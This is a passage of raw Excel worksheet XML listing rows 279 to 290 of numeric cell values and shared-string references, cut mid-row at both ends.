        <v>0</v>
      </c>
      <c r="Q279">
        <v>0</v>
      </c>
      <c r="R279">
        <v>0</v>
      </c>
      <c r="S279">
        <v>0</v>
      </c>
      <c r="T279">
        <v>0</v>
      </c>
      <c r="U279">
        <v>1000000</v>
      </c>
      <c r="V279">
        <v>0</v>
      </c>
      <c r="W279">
        <v>10000</v>
      </c>
      <c r="X279">
        <v>0</v>
      </c>
      <c r="Y279">
        <v>0</v>
      </c>
      <c r="Z279">
        <v>0</v>
      </c>
      <c r="AA279">
        <v>0</v>
      </c>
      <c r="AB279">
        <v>0</v>
      </c>
      <c r="AC279">
        <v>0</v>
      </c>
      <c r="AD279">
        <v>0</v>
      </c>
      <c r="AE279">
        <v>0</v>
      </c>
      <c r="AF279" t="s">
        <v>2361</v>
      </c>
      <c r="AG279">
        <v>14450</v>
      </c>
      <c r="AH279">
        <v>12</v>
      </c>
      <c r="AJ279">
        <v>160</v>
      </c>
      <c r="AK279" t="s">
        <v>396</v>
      </c>
      <c r="AL279" t="s">
        <v>115</v>
      </c>
      <c r="AM279" t="s">
        <v>2362</v>
      </c>
      <c r="AN279" t="s">
        <v>55</v>
      </c>
      <c r="AO279">
        <v>2010</v>
      </c>
      <c r="AP279">
        <v>216614249</v>
      </c>
      <c r="AQ279" t="s">
        <v>2363</v>
      </c>
      <c r="AR279" t="s">
        <v>2322</v>
      </c>
      <c r="AS279" t="s">
        <v>71</v>
      </c>
      <c r="AT279" t="s">
        <v>58</v>
      </c>
      <c r="AU279">
        <v>26</v>
      </c>
      <c r="AV279">
        <v>0</v>
      </c>
      <c r="AW279">
        <v>0</v>
      </c>
      <c r="AX279">
        <v>0</v>
      </c>
      <c r="AY279">
        <v>15</v>
      </c>
      <c r="AZ279">
        <v>4</v>
      </c>
      <c r="BA279" t="s">
        <v>16611</v>
      </c>
      <c r="BB279" t="s">
        <v>14307</v>
      </c>
      <c r="BC279">
        <v>0</v>
      </c>
      <c r="BD279" t="s">
        <v>10037</v>
      </c>
    </row>
    <row r="280" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A280">
        <v>28</v>
      </c>
      <c r="B280" t="s">
        <v>2364</v>
      </c>
      <c r="C280" t="s">
        <v>88</v>
      </c>
      <c r="D280" t="s">
        <v>2365</v>
      </c>
      <c r="E280" t="s">
        <v>111</v>
      </c>
      <c r="F280" t="s">
        <v>2366</v>
      </c>
      <c r="G280" s="1">
        <v>43843</v>
      </c>
      <c r="H280">
        <v>9929</v>
      </c>
      <c r="I280">
        <v>9929</v>
      </c>
      <c r="J280">
        <v>3</v>
      </c>
      <c r="K280">
        <v>2</v>
      </c>
      <c r="L280">
        <v>4</v>
      </c>
      <c r="M280">
        <v>0</v>
      </c>
      <c r="N280">
        <v>0</v>
      </c>
      <c r="O280">
        <v>0</v>
      </c>
      <c r="P280">
        <v>0</v>
      </c>
      <c r="Q280">
        <v>0</v>
      </c>
      <c r="R280">
        <v>0</v>
      </c>
      <c r="S280">
        <v>1</v>
      </c>
      <c r="T280">
        <v>0</v>
      </c>
      <c r="U280">
        <v>60000</v>
      </c>
      <c r="V280">
        <v>15000</v>
      </c>
      <c r="W280">
        <v>80000</v>
      </c>
      <c r="X280">
        <v>0</v>
      </c>
      <c r="Y280">
        <v>0</v>
      </c>
      <c r="Z280">
        <v>0</v>
      </c>
      <c r="AA280">
        <v>0</v>
      </c>
      <c r="AB280">
        <v>0</v>
      </c>
      <c r="AC280">
        <v>0</v>
      </c>
      <c r="AD280">
        <v>1</v>
      </c>
      <c r="AE280">
        <v>0</v>
      </c>
      <c r="AF280" t="s">
        <v>2367</v>
      </c>
      <c r="AG280">
        <v>80222</v>
      </c>
      <c r="AH280">
        <v>17</v>
      </c>
      <c r="AJ280">
        <v>282</v>
      </c>
      <c r="AK280" t="s">
        <v>592</v>
      </c>
      <c r="AL280" t="s">
        <v>593</v>
      </c>
      <c r="AM280" t="s">
        <v>2368</v>
      </c>
      <c r="AN280" t="s">
        <v>288</v>
      </c>
      <c r="AO280">
        <v>2009</v>
      </c>
      <c r="AP280" t="s">
        <v>2369</v>
      </c>
      <c r="AQ280" t="s">
        <v>2370</v>
      </c>
      <c r="AR280" t="s">
        <v>2371</v>
      </c>
      <c r="AU280">
        <v>0</v>
      </c>
      <c r="AV280">
        <v>0</v>
      </c>
      <c r="AW280">
        <v>0</v>
      </c>
      <c r="AX280">
        <v>0</v>
      </c>
      <c r="AY280">
        <v>54</v>
      </c>
      <c r="AZ280">
        <v>46</v>
      </c>
      <c r="BA280" t="s">
        <v>16588</v>
      </c>
      <c r="BB280" t="s">
        <v>14232</v>
      </c>
      <c r="BC280">
        <v>0</v>
      </c>
      <c r="BD280">
        <v>0</v>
      </c>
    </row>
    <row r="281" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A281">
        <v>567</v>
      </c>
      <c r="B281" t="s">
        <v>2372</v>
      </c>
      <c r="C281" t="s">
        <v>129</v>
      </c>
      <c r="D281" t="s">
        <v>2373</v>
      </c>
      <c r="E281" t="s">
        <v>142</v>
      </c>
      <c r="F281" t="s">
        <v>2374</v>
      </c>
      <c r="G281" s="1">
        <v>44313</v>
      </c>
      <c r="H281">
        <v>9992</v>
      </c>
      <c r="I281">
        <v>9992</v>
      </c>
      <c r="J281">
        <v>0</v>
      </c>
      <c r="K281">
        <v>1</v>
      </c>
      <c r="L281">
        <v>0</v>
      </c>
      <c r="M281">
        <v>0</v>
      </c>
      <c r="N281">
        <v>0</v>
      </c>
      <c r="O281">
        <v>0</v>
      </c>
      <c r="P281">
        <v>0</v>
      </c>
      <c r="Q281">
        <v>0</v>
      </c>
      <c r="R281">
        <v>0</v>
      </c>
      <c r="S281">
        <v>0</v>
      </c>
      <c r="T281">
        <v>0</v>
      </c>
      <c r="U281">
        <v>0</v>
      </c>
      <c r="V281">
        <v>500000</v>
      </c>
      <c r="W281">
        <v>0</v>
      </c>
      <c r="X281">
        <v>0</v>
      </c>
      <c r="Y281">
        <v>0</v>
      </c>
      <c r="Z281">
        <v>0</v>
      </c>
      <c r="AA281">
        <v>0</v>
      </c>
      <c r="AB281">
        <v>0</v>
      </c>
      <c r="AC281">
        <v>0</v>
      </c>
      <c r="AD281">
        <v>0</v>
      </c>
      <c r="AE281">
        <v>0</v>
      </c>
      <c r="AF281" t="s">
        <v>2375</v>
      </c>
      <c r="AG281">
        <v>15213</v>
      </c>
      <c r="AH281">
        <v>11</v>
      </c>
      <c r="AJ281">
        <v>268</v>
      </c>
      <c r="AK281" t="s">
        <v>252</v>
      </c>
      <c r="AL281" t="s">
        <v>174</v>
      </c>
      <c r="AM281" t="s">
        <v>2376</v>
      </c>
      <c r="AN281" t="s">
        <v>55</v>
      </c>
      <c r="AO281">
        <v>2017</v>
      </c>
      <c r="AP281" t="s">
        <v>2377</v>
      </c>
      <c r="AQ281" t="s">
        <v>2378</v>
      </c>
      <c r="AR281" t="s">
        <v>2379</v>
      </c>
      <c r="AS281" t="s">
        <v>187</v>
      </c>
      <c r="AT281" t="s">
        <v>58</v>
      </c>
      <c r="AU281">
        <v>27</v>
      </c>
      <c r="AV281">
        <v>0</v>
      </c>
      <c r="AW281">
        <v>0</v>
      </c>
      <c r="AX281">
        <v>0</v>
      </c>
      <c r="AY281">
        <v>2</v>
      </c>
      <c r="AZ281">
        <v>0</v>
      </c>
      <c r="BA281" t="s">
        <v>17685</v>
      </c>
      <c r="BB281" t="s">
        <v>14680</v>
      </c>
      <c r="BC281" t="s">
        <v>9550</v>
      </c>
      <c r="BD281" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="282" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A282">
        <v>162</v>
      </c>
      <c r="B282" t="s">
        <v>2380</v>
      </c>
      <c r="C282" t="s">
        <v>168</v>
      </c>
      <c r="D282" t="s">
        <v>2381</v>
      </c>
      <c r="E282" t="s">
        <v>131</v>
      </c>
      <c r="F282" t="s">
        <v>2382</v>
      </c>
      <c r="G282" s="1">
        <v>44341</v>
      </c>
      <c r="H282">
        <v>10254</v>
      </c>
      <c r="I282">
        <v>10254</v>
      </c>
      <c r="J282">
        <v>0</v>
      </c>
      <c r="K282">
        <v>0</v>
      </c>
      <c r="L282">
        <v>0</v>
      </c>
      <c r="M282">
        <v>0</v>
      </c>
      <c r="N282">
        <v>0</v>
      </c>
      <c r="O282">
        <v>0</v>
      </c>
      <c r="P282">
        <v>0</v>
      </c>
      <c r="Q282">
        <v>0</v>
      </c>
      <c r="R282">
        <v>0</v>
      </c>
      <c r="S282">
        <v>0</v>
      </c>
      <c r="T282">
        <v>2</v>
      </c>
      <c r="U282">
        <v>0</v>
      </c>
      <c r="V282">
        <v>0</v>
      </c>
      <c r="W282">
        <v>0</v>
      </c>
      <c r="X282">
        <v>0</v>
      </c>
      <c r="Y282">
        <v>0</v>
      </c>
      <c r="Z282">
        <v>0</v>
      </c>
      <c r="AA282">
        <v>0</v>
      </c>
      <c r="AB282">
        <v>0</v>
      </c>
      <c r="AC282">
        <v>0</v>
      </c>
      <c r="AD282">
        <v>0</v>
      </c>
      <c r="AE282">
        <v>200000</v>
      </c>
      <c r="AF282" t="s">
        <v>2383</v>
      </c>
      <c r="AG282">
        <v>17133</v>
      </c>
      <c r="AH282">
        <v>13</v>
      </c>
      <c r="AJ282">
        <v>183</v>
      </c>
      <c r="AK282" t="s">
        <v>2384</v>
      </c>
      <c r="AL282" t="s">
        <v>2385</v>
      </c>
      <c r="AM282" t="s">
        <v>2386</v>
      </c>
      <c r="AN282" t="s">
        <v>55</v>
      </c>
      <c r="AO282">
        <v>2008</v>
      </c>
      <c r="AP282" t="s">
        <v>2387</v>
      </c>
      <c r="AQ282" t="s">
        <v>2388</v>
      </c>
      <c r="AR282" t="s">
        <v>2383</v>
      </c>
      <c r="AS282" t="s">
        <v>553</v>
      </c>
      <c r="AT282" t="s">
        <v>58</v>
      </c>
      <c r="AU282">
        <v>0</v>
      </c>
      <c r="AV282">
        <v>0</v>
      </c>
      <c r="AW282">
        <v>30</v>
      </c>
      <c r="AX282">
        <v>15</v>
      </c>
      <c r="AY282">
        <v>15</v>
      </c>
      <c r="AZ282">
        <v>5</v>
      </c>
      <c r="BA282" t="s">
        <v>16625</v>
      </c>
      <c r="BB282" t="s">
        <v>14350</v>
      </c>
      <c r="BC282" t="s">
        <v>9571</v>
      </c>
      <c r="BD282">
        <v>0</v>
      </c>
    </row>
    <row r="283" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A283">
        <v>529</v>
      </c>
      <c r="B283" t="s">
        <v>2389</v>
      </c>
      <c r="C283" t="s">
        <v>318</v>
      </c>
      <c r="D283" t="s">
        <v>2390</v>
      </c>
      <c r="E283" t="s">
        <v>111</v>
      </c>
      <c r="F283" t="s">
        <v>2391</v>
      </c>
      <c r="G283" s="1">
        <v>44322</v>
      </c>
      <c r="H283">
        <v>10416</v>
      </c>
      <c r="I283">
        <v>10416</v>
      </c>
      <c r="J283">
        <v>2</v>
      </c>
      <c r="K283">
        <v>0</v>
      </c>
      <c r="L283">
        <v>2</v>
      </c>
      <c r="M283">
        <v>0</v>
      </c>
      <c r="N283">
        <v>0</v>
      </c>
      <c r="O283">
        <v>0</v>
      </c>
      <c r="P283">
        <v>0</v>
      </c>
      <c r="Q283">
        <v>8</v>
      </c>
      <c r="R283">
        <v>10</v>
      </c>
      <c r="S283">
        <v>0</v>
      </c>
      <c r="T283">
        <v>2</v>
      </c>
      <c r="U283">
        <v>100000</v>
      </c>
      <c r="V283">
        <v>0</v>
      </c>
      <c r="W283">
        <v>7000</v>
      </c>
      <c r="X283">
        <v>0</v>
      </c>
      <c r="Y283">
        <v>0</v>
      </c>
      <c r="Z283">
        <v>0</v>
      </c>
      <c r="AA283">
        <v>0</v>
      </c>
      <c r="AB283">
        <v>800</v>
      </c>
      <c r="AC283">
        <v>3000</v>
      </c>
      <c r="AD283">
        <v>0</v>
      </c>
      <c r="AE283">
        <v>100000</v>
      </c>
      <c r="AF283" t="s">
        <v>2392</v>
      </c>
      <c r="AG283">
        <v>90552</v>
      </c>
      <c r="AH283">
        <v>26</v>
      </c>
      <c r="AJ283">
        <v>406</v>
      </c>
      <c r="AK283" t="s">
        <v>2393</v>
      </c>
      <c r="AL283" t="s">
        <v>2394</v>
      </c>
      <c r="AM283" t="s">
        <v>2395</v>
      </c>
      <c r="AN283" t="s">
        <v>82</v>
      </c>
      <c r="AO283">
        <v>2002</v>
      </c>
      <c r="AP283">
        <v>85299472362</v>
      </c>
      <c r="AQ283" t="s">
        <v>2396</v>
      </c>
      <c r="AR283" t="s">
        <v>2392</v>
      </c>
      <c r="AS283" t="s">
        <v>71</v>
      </c>
      <c r="AT283" t="s">
        <v>86</v>
      </c>
      <c r="AU283">
        <v>25</v>
      </c>
      <c r="AV283">
        <v>1</v>
      </c>
      <c r="AW283">
        <v>19</v>
      </c>
      <c r="AX283">
        <v>12</v>
      </c>
      <c r="AY283">
        <v>13</v>
      </c>
      <c r="AZ283">
        <v>4</v>
      </c>
      <c r="BA283" t="s">
        <v>16712</v>
      </c>
      <c r="BB283" t="s">
        <v>14647</v>
      </c>
      <c r="BC283">
        <v>0</v>
      </c>
      <c r="BD283" t="s">
        <v>13692</v>
      </c>
    </row>
    <row r="284" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A284">
        <v>161</v>
      </c>
      <c r="B284" t="s">
        <v>2397</v>
      </c>
      <c r="C284" t="s">
        <v>129</v>
      </c>
      <c r="D284" t="s">
        <v>2398</v>
      </c>
      <c r="E284" t="s">
        <v>142</v>
      </c>
      <c r="F284" t="s">
        <v>2399</v>
      </c>
      <c r="G284" s="1">
        <v>44327</v>
      </c>
      <c r="H284">
        <v>10432</v>
      </c>
      <c r="I284">
        <v>10432</v>
      </c>
      <c r="J284">
        <v>0</v>
      </c>
      <c r="K284">
        <v>1</v>
      </c>
      <c r="L284">
        <v>0</v>
      </c>
      <c r="M284">
        <v>0</v>
      </c>
      <c r="N284">
        <v>0</v>
      </c>
      <c r="O284">
        <v>0</v>
      </c>
      <c r="P284">
        <v>0</v>
      </c>
      <c r="Q284">
        <v>0</v>
      </c>
      <c r="R284">
        <v>0</v>
      </c>
      <c r="S284">
        <v>0</v>
      </c>
      <c r="T284">
        <v>0</v>
      </c>
      <c r="U284">
        <v>0</v>
      </c>
      <c r="V284">
        <v>500000</v>
      </c>
      <c r="W284">
        <v>0</v>
      </c>
      <c r="X284">
        <v>0</v>
      </c>
      <c r="Y284">
        <v>0</v>
      </c>
      <c r="Z284">
        <v>0</v>
      </c>
      <c r="AA284">
        <v>0</v>
      </c>
      <c r="AB284">
        <v>0</v>
      </c>
      <c r="AC284">
        <v>0</v>
      </c>
      <c r="AD284">
        <v>0</v>
      </c>
      <c r="AE284">
        <v>0</v>
      </c>
      <c r="AF284" t="s">
        <v>2400</v>
      </c>
      <c r="AG284">
        <v>15212</v>
      </c>
      <c r="AH284">
        <v>11</v>
      </c>
      <c r="AJ284">
        <v>268</v>
      </c>
      <c r="AK284" t="s">
        <v>252</v>
      </c>
      <c r="AL284" t="s">
        <v>521</v>
      </c>
      <c r="AM284" t="s">
        <v>2401</v>
      </c>
      <c r="AN284" t="s">
        <v>55</v>
      </c>
      <c r="AO284">
        <v>2017</v>
      </c>
      <c r="AP284" t="s">
        <v>2402</v>
      </c>
      <c r="AQ284" t="s">
        <v>2403</v>
      </c>
      <c r="AR284" t="s">
        <v>2404</v>
      </c>
      <c r="AS284" t="s">
        <v>187</v>
      </c>
      <c r="AT284" t="s">
        <v>58</v>
      </c>
      <c r="AU284">
        <v>27</v>
      </c>
      <c r="AV284">
        <v>0</v>
      </c>
      <c r="AW284">
        <v>3</v>
      </c>
      <c r="AX284">
        <v>0</v>
      </c>
      <c r="AY284">
        <v>2</v>
      </c>
      <c r="AZ284">
        <v>2</v>
      </c>
      <c r="BA284" t="s">
        <v>16624</v>
      </c>
      <c r="BB284" t="s">
        <v>14349</v>
      </c>
      <c r="BC284" t="s">
        <v>9485</v>
      </c>
      <c r="BD284" t="s">
        <v>10858</v>
      </c>
    </row>
    <row r="285" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A285">
        <v>204</v>
      </c>
      <c r="B285" t="s">
        <v>2405</v>
      </c>
      <c r="C285" t="s">
        <v>74</v>
      </c>
      <c r="D285" t="s">
        <v>2406</v>
      </c>
      <c r="E285" t="s">
        <v>944</v>
      </c>
      <c r="F285" t="s">
        <v>2407</v>
      </c>
      <c r="G285" s="1">
        <v>44357</v>
      </c>
      <c r="H285">
        <v>10451</v>
      </c>
      <c r="I285">
        <v>10451</v>
      </c>
      <c r="J285">
        <v>1</v>
      </c>
      <c r="K285">
        <v>1</v>
      </c>
      <c r="L285">
        <v>0</v>
      </c>
      <c r="M285">
        <v>0</v>
      </c>
      <c r="N285">
        <v>0</v>
      </c>
      <c r="O285">
        <v>0</v>
      </c>
      <c r="P285">
        <v>2</v>
      </c>
      <c r="Q285">
        <v>0</v>
      </c>
      <c r="R285">
        <v>0</v>
      </c>
      <c r="S285">
        <v>0</v>
      </c>
      <c r="T285">
        <v>1</v>
      </c>
      <c r="U285">
        <v>25000</v>
      </c>
      <c r="V285">
        <v>20000</v>
      </c>
      <c r="W285">
        <v>0</v>
      </c>
      <c r="X285">
        <v>0</v>
      </c>
      <c r="Y285">
        <v>0</v>
      </c>
      <c r="Z285">
        <v>0</v>
      </c>
      <c r="AA285">
        <v>15000</v>
      </c>
      <c r="AB285">
        <v>0</v>
      </c>
      <c r="AC285">
        <v>0</v>
      </c>
      <c r="AD285">
        <v>0</v>
      </c>
      <c r="AE285">
        <v>2000</v>
      </c>
      <c r="AF285" t="s">
        <v>2408</v>
      </c>
      <c r="AG285">
        <v>52319</v>
      </c>
      <c r="AH285">
        <v>14</v>
      </c>
      <c r="AJ285">
        <v>214</v>
      </c>
      <c r="AK285" t="s">
        <v>2409</v>
      </c>
      <c r="AL285" t="s">
        <v>2410</v>
      </c>
      <c r="AM285" t="s">
        <v>2411</v>
      </c>
      <c r="AN285" t="s">
        <v>55</v>
      </c>
      <c r="AO285">
        <v>2016</v>
      </c>
      <c r="AP285">
        <v>2843290401</v>
      </c>
      <c r="AQ285" t="s">
        <v>2412</v>
      </c>
      <c r="AR285" t="s">
        <v>2413</v>
      </c>
      <c r="AS285" t="s">
        <v>371</v>
      </c>
      <c r="AT285" t="s">
        <v>72</v>
      </c>
      <c r="AU285">
        <v>25</v>
      </c>
      <c r="AV285">
        <v>1</v>
      </c>
      <c r="AW285">
        <v>12</v>
      </c>
      <c r="AX285">
        <v>48</v>
      </c>
      <c r="AY285">
        <v>4</v>
      </c>
      <c r="AZ285">
        <v>2</v>
      </c>
      <c r="BA285" t="s">
        <v>16639</v>
      </c>
      <c r="BB285" t="s">
        <v>14381</v>
      </c>
      <c r="BC285">
        <v>0</v>
      </c>
      <c r="BD285" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="286" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A286">
        <v>296</v>
      </c>
      <c r="B286" t="s">
        <v>2414</v>
      </c>
      <c r="C286" t="s">
        <v>74</v>
      </c>
      <c r="D286" t="s">
        <v>2415</v>
      </c>
      <c r="E286" t="s">
        <v>142</v>
      </c>
      <c r="F286" t="s">
        <v>2416</v>
      </c>
      <c r="G286" s="1">
        <v>44344</v>
      </c>
      <c r="H286">
        <v>11136</v>
      </c>
      <c r="I286">
        <v>11136</v>
      </c>
      <c r="J286">
        <v>4</v>
      </c>
      <c r="K286">
        <v>0</v>
      </c>
      <c r="L286">
        <v>6</v>
      </c>
      <c r="M286">
        <v>7</v>
      </c>
      <c r="N286">
        <v>0</v>
      </c>
      <c r="O286">
        <v>0</v>
      </c>
      <c r="P286">
        <v>0</v>
      </c>
      <c r="Q286">
        <v>0</v>
      </c>
      <c r="R286">
        <v>6</v>
      </c>
      <c r="S286">
        <v>0</v>
      </c>
      <c r="T286">
        <v>1</v>
      </c>
      <c r="U286">
        <v>9000</v>
      </c>
      <c r="V286">
        <v>0</v>
      </c>
      <c r="W286">
        <v>6000</v>
      </c>
      <c r="X286">
        <v>7000</v>
      </c>
      <c r="Y286">
        <v>0</v>
      </c>
      <c r="Z286">
        <v>0</v>
      </c>
      <c r="AA286">
        <v>0</v>
      </c>
      <c r="AB286">
        <v>0</v>
      </c>
      <c r="AC286">
        <v>3000</v>
      </c>
      <c r="AD286">
        <v>0</v>
      </c>
      <c r="AE286">
        <v>50000</v>
      </c>
      <c r="AF286" t="s">
        <v>2417</v>
      </c>
      <c r="AG286">
        <v>59272</v>
      </c>
      <c r="AH286">
        <v>14</v>
      </c>
      <c r="AJ286">
        <v>204</v>
      </c>
      <c r="AK286" t="s">
        <v>2418</v>
      </c>
      <c r="AL286" t="s">
        <v>2419</v>
      </c>
      <c r="AM286" t="s">
        <v>2420</v>
      </c>
      <c r="AN286" t="s">
        <v>82</v>
      </c>
      <c r="AO286">
        <v>2013</v>
      </c>
      <c r="AP286">
        <v>81231196881</v>
      </c>
      <c r="AQ286" t="s">
        <v>2421</v>
      </c>
      <c r="AR286" t="s">
        <v>2422</v>
      </c>
      <c r="AS286" t="s">
        <v>71</v>
      </c>
      <c r="AT286" t="s">
        <v>86</v>
      </c>
      <c r="AU286">
        <v>25</v>
      </c>
      <c r="AV286">
        <v>2</v>
      </c>
      <c r="AW286">
        <v>153</v>
      </c>
      <c r="AX286">
        <v>114</v>
      </c>
      <c r="AY286">
        <v>6</v>
      </c>
      <c r="AZ286">
        <v>1</v>
      </c>
      <c r="BA286" t="s">
        <v>16660</v>
      </c>
      <c r="BB286" t="s">
        <v>14351</v>
      </c>
      <c r="BC286">
        <v>0</v>
      </c>
      <c r="BD286" t="s">
        <v>13027</v>
      </c>
    </row>
    <row r="287" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A287">
        <v>511</v>
      </c>
      <c r="B287" t="s">
        <v>2423</v>
      </c>
      <c r="C287" t="s">
        <v>458</v>
      </c>
      <c r="D287" t="s">
        <v>2424</v>
      </c>
      <c r="E287" t="s">
        <v>111</v>
      </c>
      <c r="F287" t="s">
        <v>2425</v>
      </c>
      <c r="G287" s="1">
        <v>44378</v>
      </c>
      <c r="H287">
        <v>11619</v>
      </c>
      <c r="I287">
        <v>11619</v>
      </c>
      <c r="J287">
        <v>1</v>
      </c>
      <c r="K287">
        <v>1</v>
      </c>
      <c r="L287">
        <v>2</v>
      </c>
      <c r="M287">
        <v>0</v>
      </c>
      <c r="N287">
        <v>0</v>
      </c>
      <c r="O287">
        <v>0</v>
      </c>
      <c r="P287">
        <v>0</v>
      </c>
      <c r="Q287">
        <v>0</v>
      </c>
      <c r="R287">
        <v>0</v>
      </c>
      <c r="S287">
        <v>0</v>
      </c>
      <c r="T287">
        <v>0</v>
      </c>
      <c r="U287">
        <v>3000</v>
      </c>
      <c r="V287">
        <v>350000</v>
      </c>
      <c r="W287">
        <v>353000</v>
      </c>
      <c r="X287">
        <v>0</v>
      </c>
      <c r="Y287">
        <v>0</v>
      </c>
      <c r="Z287">
        <v>0</v>
      </c>
      <c r="AA287">
        <v>0</v>
      </c>
      <c r="AB287">
        <v>0</v>
      </c>
      <c r="AC287">
        <v>0</v>
      </c>
      <c r="AD287">
        <v>0</v>
      </c>
      <c r="AE287">
        <v>0</v>
      </c>
      <c r="AF287" t="s">
        <v>2426</v>
      </c>
      <c r="AG287">
        <v>29444</v>
      </c>
      <c r="AH287">
        <v>5</v>
      </c>
      <c r="AJ287">
        <v>153</v>
      </c>
      <c r="AK287" t="s">
        <v>2427</v>
      </c>
      <c r="AL287" t="s">
        <v>2428</v>
      </c>
      <c r="AM287" t="s">
        <v>2429</v>
      </c>
      <c r="AN287" t="s">
        <v>55</v>
      </c>
      <c r="AO287">
        <v>2002</v>
      </c>
      <c r="AP287">
        <v>8127008382</v>
      </c>
      <c r="AQ287" t="s">
        <v>2430</v>
      </c>
      <c r="AR287" t="s">
        <v>2426</v>
      </c>
      <c r="AS287" t="s">
        <v>71</v>
      </c>
      <c r="AT287" t="s">
        <v>58</v>
      </c>
      <c r="AU287">
        <v>26</v>
      </c>
      <c r="AV287">
        <v>1</v>
      </c>
      <c r="AW287">
        <v>4</v>
      </c>
      <c r="AX287">
        <v>0</v>
      </c>
      <c r="AY287">
        <v>12</v>
      </c>
      <c r="AZ287">
        <v>2</v>
      </c>
      <c r="BA287" t="s">
        <v>16708</v>
      </c>
      <c r="BB287" t="s">
        <v>14632</v>
      </c>
      <c r="BC287" t="s">
        <v>14070</v>
      </c>
      <c r="BD287" t="s">
        <v>11207</v>
      </c>
    </row>
    <row r="288" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A288">
        <v>715</v>
      </c>
      <c r="B288" t="s">
        <v>2431</v>
      </c>
      <c r="C288" t="s">
        <v>47</v>
      </c>
      <c r="D288" t="s">
        <v>2432</v>
      </c>
      <c r="E288" t="s">
        <v>363</v>
      </c>
      <c r="F288" t="s">
        <v>2433</v>
      </c>
      <c r="G288" s="1">
        <v>44358</v>
      </c>
      <c r="H288">
        <v>11635</v>
      </c>
      <c r="I288">
        <v>11635</v>
      </c>
      <c r="J288">
        <v>0</v>
      </c>
      <c r="K288">
        <v>0</v>
      </c>
      <c r="L288">
        <v>0</v>
      </c>
      <c r="M288">
        <v>0</v>
      </c>
      <c r="N288">
        <v>0</v>
      </c>
      <c r="O288">
        <v>0</v>
      </c>
      <c r="P288">
        <v>0</v>
      </c>
      <c r="Q288">
        <v>0</v>
      </c>
      <c r="R288">
        <v>0</v>
      </c>
      <c r="S288">
        <v>0</v>
      </c>
      <c r="T288">
        <v>1</v>
      </c>
      <c r="U288">
        <v>0</v>
      </c>
      <c r="V288">
        <v>0</v>
      </c>
      <c r="W288">
        <v>0</v>
      </c>
      <c r="X288">
        <v>0</v>
      </c>
      <c r="Y288">
        <v>0</v>
      </c>
      <c r="Z288">
        <v>0</v>
      </c>
      <c r="AA288">
        <v>0</v>
      </c>
      <c r="AB288">
        <v>0</v>
      </c>
      <c r="AC288">
        <v>0</v>
      </c>
      <c r="AD288">
        <v>0</v>
      </c>
      <c r="AE288">
        <v>1000</v>
      </c>
      <c r="AF288" t="s">
        <v>2434</v>
      </c>
      <c r="AG288">
        <v>20212</v>
      </c>
      <c r="AH288">
        <v>2</v>
      </c>
      <c r="AJ288">
        <v>53</v>
      </c>
      <c r="AK288" t="s">
        <v>2435</v>
      </c>
      <c r="AL288" t="s">
        <v>2436</v>
      </c>
      <c r="AM288" t="s">
        <v>2437</v>
      </c>
      <c r="AN288" t="s">
        <v>68</v>
      </c>
      <c r="AO288">
        <v>2016</v>
      </c>
      <c r="AP288">
        <v>617342161</v>
      </c>
      <c r="AQ288" t="s">
        <v>2438</v>
      </c>
      <c r="AR288" t="s">
        <v>2439</v>
      </c>
      <c r="AS288" t="s">
        <v>371</v>
      </c>
      <c r="AT288" t="s">
        <v>72</v>
      </c>
      <c r="AU288">
        <v>24</v>
      </c>
      <c r="AV288">
        <v>1</v>
      </c>
      <c r="AW288">
        <v>1</v>
      </c>
      <c r="AX288">
        <v>1</v>
      </c>
      <c r="AY288">
        <v>3</v>
      </c>
      <c r="AZ288">
        <v>3</v>
      </c>
      <c r="BA288" t="s">
        <v>16745</v>
      </c>
      <c r="BB288" t="s">
        <v>14798</v>
      </c>
      <c r="BC288">
        <v>0</v>
      </c>
      <c r="BD288" t="s">
        <v>14052</v>
      </c>
    </row>
    <row r="289" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A289">
        <v>18</v>
      </c>
      <c r="B289" t="s">
        <v>2440</v>
      </c>
      <c r="C289" t="s">
        <v>1672</v>
      </c>
      <c r="D289" t="s">
        <v>2441</v>
      </c>
      <c r="E289" t="s">
        <v>49</v>
      </c>
      <c r="F289" t="s">
        <v>2442</v>
      </c>
      <c r="G289" s="1">
        <v>43871</v>
      </c>
      <c r="AF289" t="s">
        <v>2443</v>
      </c>
      <c r="AG289">
        <v>70724</v>
      </c>
      <c r="AH289">
        <v>22</v>
      </c>
      <c r="AJ289">
        <v>355</v>
      </c>
      <c r="AK289" t="s">
        <v>2444</v>
      </c>
      <c r="AL289" t="s">
        <v>2445</v>
      </c>
      <c r="AM289" t="s">
        <v>2446</v>
      </c>
      <c r="AN289" t="s">
        <v>288</v>
      </c>
      <c r="AO289">
        <v>2007</v>
      </c>
      <c r="AP289">
        <v>5114282600</v>
      </c>
      <c r="AQ289">
        <v>82133212908</v>
      </c>
      <c r="AR289" t="s">
        <v>2443</v>
      </c>
      <c r="AS289" t="s">
        <v>371</v>
      </c>
      <c r="AT289" t="s">
        <v>72</v>
      </c>
      <c r="AU289" t="e">
        <v>#N/A</v>
      </c>
      <c r="AV289" t="e">
        <v>#N/A</v>
      </c>
      <c r="AW289" t="e">
        <v>#N/A</v>
      </c>
      <c r="AX289" t="e">
        <v>#N/A</v>
      </c>
      <c r="AY289" t="e">
        <v>#N/A</v>
      </c>
      <c r="AZ289" t="e">
        <v>#N/A</v>
      </c>
      <c r="BA289" t="s">
        <v>16585</v>
      </c>
      <c r="BB289" t="s">
        <v>14222</v>
      </c>
      <c r="BC289">
        <v>0</v>
      </c>
      <c r="BD289">
        <v>0</v>
      </c>
    </row>
    <row r="290" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A290">
        <v>246</v>
      </c>
      <c r="B290" t="s">
        <v>2447</v>
      </c>
      <c r="C290" t="s">
        <v>157</v>
      </c>
      <c r="D290" t="s">
        <v>2448</v>
      </c>
      <c r="E290" t="s">
        <v>142</v>
      </c>
      <c r="F290" t="s">
        <v>2449</v>
      </c>
      <c r="G290" s="1">
        <v>43847</v>
      </c>
      <c r="AF290" t="s">
        <v>1348</v>
      </c>
      <c r="AG290">
